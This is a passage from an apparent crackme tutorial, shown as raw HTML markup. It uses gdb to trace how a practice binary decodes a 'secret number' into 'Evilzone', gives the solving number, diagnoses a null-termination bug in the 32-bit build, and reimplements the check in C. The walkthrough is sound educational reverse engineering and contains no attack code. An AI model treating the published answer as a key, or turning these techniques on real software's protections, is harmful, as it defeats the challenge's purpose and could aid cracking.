7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"c/span/span span class="code-line"span class="go"Continuing./span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 5, 0x08048735 in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disass $eip,+20/span/span span class="code-line"span class="go"Dump of assembler code from 0x8048735 to 0x8048749:/span/span span class="code-line"span class="go"=gt; 0x08048735 lt;main+233gt;: call 0x8048500 lt;[email protected];/span/span span class="code-line"span class="go" 0x0804873a lt;main+238gt;: lea ecx,[esp+0x2d]/span/span span class="code-line"span class="go" 0x0804873e lt;main+242gt;: mov edx,DWORD PTR [esp+0x18]/span/span span class="code-line"span class="go" 0x08048742 lt;main+246gt;: add edx,ecx/span/span span class="code-line"span class="go" 0x08048744 lt;main+248gt;: mov BYTE PTR [edx],al/span/span span class="code-line"span class="go" 0x08048746 lt;main+250gt;: add DWORD PTR [esp+0x18],0x1/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"/code/pre/div /td/tr/table pWe are now at the atoi call, again lets step inside and have a peek at the arguments:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"stepi/span/span span class="code-line"span class="go"0x08048500 in [email protected] ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/3xw $esp/span/span span class="code-line"span class="go"0xbffffc2c: 0x0804873a 0xbffffc45 0xbffffc65/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0xbffffc45/span/span span class="code-line"span class="go"0xbffffc45: quot;345\001quot;/span/span span class="code-line"/code/pre/div /td/tr/table pOk, so that looks like the next 3 numbers I put in as my secret number (69345678), lets continue:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"c/span/span span class="code-line"span class="go"Continuing./span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 4, 0x08048724 in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disass $eip,+20/span/span span class="code-line"span class="go"Dump of assembler code from 0x8048724 to 0x8048738:/span/span span class="code-line"span class="go"=gt; 0x08048724 lt;main+216gt;: call 0x80484d0 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048729 lt;main+221gt;: cmp eax,0x7/span/span span class="code-line"span class="go" 0x0804872c lt;main+224gt;: ja 0x8048746 lt;main+250gt;/span/span span class="code-line"span class="go" 0x0804872e lt;main+226gt;: lea eax,[esp+0x15]/span/span span class="code-line"span class="go" 0x08048732 lt;main+230gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x08048735 lt;main+233gt;: call 0x8048500 lt;[email protected];/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"stepi/span/span span class="code-line"span class="go"0x080484d0 in [email protected] ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/3xw $esp/span/span span class="code-line"span class="go"0xbffffc2c: 0x08048729 0xbffffc5d 0xbffffc65/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0xbffffc5d/span/span span class="code-line"span class="go"0xbffffc5d: quot;EYquot;/span/span span class="code-line"/code/pre/div /td/tr/table pO..K.., that's unusual, continuing:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"c/span/span span class="code-line"span class="go"Continuing./span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 5, 0x08048735 in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disass $eip,+20/span/span span class="code-line"span class="go"Dump of assembler code from 0x8048735 to 0x8048749:/span/span span class="code-line"span class="go"=gt; 0x08048735 lt;main+233gt;: call 0x8048500 lt;[email protected];/span/span span class="code-line"span class="go" 0x0804873a lt;main+238gt;: lea ecx,[esp+0x2d]/span/span span class="code-line"span class="go" 0x0804873e lt;main+242gt;: mov edx,DWORD PTR [esp+0x18]/span/span span class="code-line"span class="go" 0x08048742 lt;main+246gt;: add edx,ecx/span/span span class="code-line"span class="go" 0x08048744 lt;main+248gt;: mov BYTE PTR [edx],al/span/span span class="code-line"span class="go" 0x08048746 lt;main+250gt;: add DWORD PTR [esp+0x18],0x1/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"stepi/span/span span class="code-line"span class="go"0x08048500 in [email protected] ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/3xw $esp/span/span span class="code-line"span class="go"0xbffffc2c: 0x0804873a 0xbffffc45 0xbffffc65/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0xbffffc45/span/span span class="code-line"span class="go"0xbffffc45: quot;678\002quot;/span/span span class="code-line"/code/pre/div /td/tr/table pHopefully you can see what I'm doing by now, so it looks like there is a loop which is going through my input number 3 by 3, starting from the 3rd character, and converting them into ascii characters. Lets remove the breakpoint at the calls to codeatoi/code and codestrlen/code and see what that codestrcmp/code is doing:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"delete 4/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"delete 5/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"c/span/span span class="code-line"span class="go"Continuing./span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 6, 0x08048770 in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disass $eip,+20/span/span span class="code-line"span class="go"Dump of assembler code from 0x8048770 to 0x8048784:/span/span span class="code-line"span class="go"=gt; 0x08048770 lt;main+292gt;: call 0x8048460 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048775 lt;main+297gt;: test eax,eax/span/span span class="code-line"span class="go" 0x08048777 lt;main+299gt;: jne 0x8048794 lt;main+328gt;/span/span span class="code-line"span class="go" 0x08048779 lt;main+301gt;: lea eax,[esp+0x2d]/span/span span class="code-line"span class="go" 0x0804877d lt;main+305gt;: mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="go" 0x08048781 lt;main+309gt;: mov DWORD PTR [esp],0x8048890/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"stepi/span/span span class="code-line"span class="go"0x08048460 in [email protected] ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/3xw $esp/span/span span class="code-line"span class="go"0xbffffc2c: 0x08048775 0xbffffc5d 0x08048886/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0xbffffc5d/span/span span class="code-line"span class="go"0xbffffc5d: quot;EY\246quot;/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0x08048886/span/span span class="code-line"span class="go"0x8048886: quot;Evilzonequot;/span/span span class="code-line"/code/pre/div /td/tr/table pAhha! So it looks like its comparing the converted string with the string found earlier with the codestrings/code command (codeEvilzone/code). 'E' is equal to 069 on the ascii table (see a href="http://unixhelp.ed.ac.uk/CGI/man-cgi?ascii+7"man ascii/a for more information), this explains why the first 2 numbers had to be 69. Using the ascii table to work out the rest of the number is easy, it turns out to be code69118105108122111110101/code./p pIt doesn't work on the 32 bit version as explained earlier so to test that it is the right number use the 64 bit version:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~/crackmes# /span./crackme1_64bit /span span class="code-line"span class="go"Please enter the secret number: 69118105108122111110101/span/span span class="code-line"span class="go"The Password translates into Evilzone, Good job./span/span span class="code-line"/code/pre/div /td/tr/table h2Investigating The Bug/h2 pGreat! Challenge cracked. Now lets run this through codegdb/code and you can see why the 32 bit version of this challenge is broken:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"span class="go"Starting program: /root/crackme/crackmes/crackme1_32bit/span/span span class="code-line"span class="go"Please enter the secret number: 69118105108122111110101/span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 6, 0x08048770 in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disass $eip,+20/span/span span class="code-line"span class="go"Dump of assembler code from 0x8048770 to 0x8048784:/span/span span class="code-line"span class="go"=gt; 0x08048770 lt;main+292gt;: call 0x8048460 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048775 lt;main+297gt;: test eax,eax/span/span span class="code-line"span class="go" 0x08048777 lt;main+299gt;: jne 0x8048794 lt;main+328gt;/span/span span class="code-line"span class="go" 0x08048779 lt;main+301gt;: lea eax,[esp+0x2d]/span/span span class="code-line"span class="go" 0x0804877d lt;main+305gt;: mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="go" 0x08048781 lt;main+309gt;: mov DWORD PTR [esp],0x8048890/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"stepi/span/span span class="code-line"span class="go"0x08048460 in [email protected] ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/3xw $esp/span/span span class="code-line"span class="go"0xbffffc2c: 0x08048775 0xbffffc5d 0x08048886/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0xbffffc5d/span/span span class="code-line"span class="go"0xbffffc5d: quot;Evilzone69118105108122111110101quot;/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0x08048886/span/span span class="code-line"span class="go"0x8048886: quot;Evilzonequot;/span/span span class="code-line"/code/pre/div /td/tr/table pOk so this will still fail but why? Look at where our original number is stored:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s $esp+0x35/span/span span class="code-line"span class="go"0xbffffc65: quot;69118105108122111110101quot;/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0xbffffc5d/span/span span class="code-line"span class="go"0xbffffc5d: quot;Evilzone69118105108122111110101quot;/span/span span class="code-line"/code/pre/div /td/tr/table p0xbffffc65 (Where our original number is stored in memory), 0xbffffc5d (Where the string converted from the original number is stored in memory), 0xbffffc65 - 0xbffffc5d = 8, so these are 8 bytes apart, the string 'Evilzone' is 8 bytes, therefore once our string is calculated, its no longer null terminated./p h2Rewriting The App/h2 pUsing the knowledge we have gained about this application, we should now be able to build it ourselves, the following is my implementation of the application written in C, please remember that the real source code may vary:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define ANSWER quot;Evilzonequot;/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"nope/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"puts/spanspan class="p"(/spanspan class="s"quot;Nope.quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"good/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"puts/spanspan class="p"(/spanspan class="s"quot;Good job.quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p",/spanspan class="w" /spanspan class="n"i/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"converted/spanspan class="p"[/spanspan class="mi"8/spanspan class="p"],/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="mi"24/spanspan class="p"],/spanspan class="w" /spanspan class="n"check/spanspan class="p"[/spanspan class="mi"4/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Please enter the secret number: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"scanf/spanspan class="p"(/spanspan class="s"quot;%23squot;/spanspan class="p",/spanspan class="w" /spanspan class="n"input/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="mi"1/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"r/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"nope/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="sc"#39;9#39;/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"])/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"nope/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="sc"#39;6#39;/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"])/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"nope/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fflush/spanspan class="p"(/spanspan class="n"stdin/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"converted/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;E#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"check/spanspan class="p"[/spanspan class="mi"3/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"for/spanspan class="w" /spanspan class="p"(/spanspan class="n"i/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"2/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"1/spanspan class="p";/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"converted/spanspan class="p")/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="mi"8/spanspan class="w" /spanspan class="o"amp;amp;/spanspan class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"input/spanspan class="p");/spanspan class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"+=/spanspan class="w" /spanspan class="mi"3/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="o"++/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"check/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="n"i/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"check/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="n"i/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"check/spanspan class="p"[/spanspan class="mi"2/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="n"i/spanspan class="o"+/spanspan class="mi"2/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"converted/spanspan class="p"[/spanspan class="n"c/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"atoi/spanspan class="p"(/spanspan class="n"check/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"converted/spanspan class="p",/spanspan class="w" /spanspan class="n"ANSWER/spanspan class="p")/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;The Password translates into %s, quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"converted/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"good/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"nope/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis application has the same issue as the original application, it doesn't work on 32 bit systems./p h3Fixing The App/h3 pIn my application there were 2 main reasons that it wasn't working on my 32 bit machine, the first was because I wasn't zero'ing out the character array that I use to store the converted string in (codeconverted/code), because of this the value returned by codestrlen/code in the for loop, on line 33, was never less than 8 and the codefor/code loop would never be executed. Secondly the string again was not being null terminated, here is the fixed application:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define ANSWER quot;Evilzonequot;/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"nope/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"puts/spanspan class="p"(/spanspan class="s"quot;Nope.quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"good/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"puts/spanspan class="p"(/spanspan class="s"quot;Good job.quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p",/spanspan class="w" /spanspan class="n"i/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"converted/spanspan class="p"[/spanspan class="mi"9/spanspan class="p"],/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="mi"24/spanspan class="p"],/spanspan class="w" /spanspan class="n"check/spanspan class="p"[/spanspan class="mi"4/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Please enter the secret number: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"scanf/spanspan class="p"(/spanspan class="s"quot;%23squot;/spanspan class="p",/spanspan class="w" /spanspan class="n"input/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="mi"1/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"r/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"nope/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="sc"#39;9#39;/spanspan class="w" /spanspan 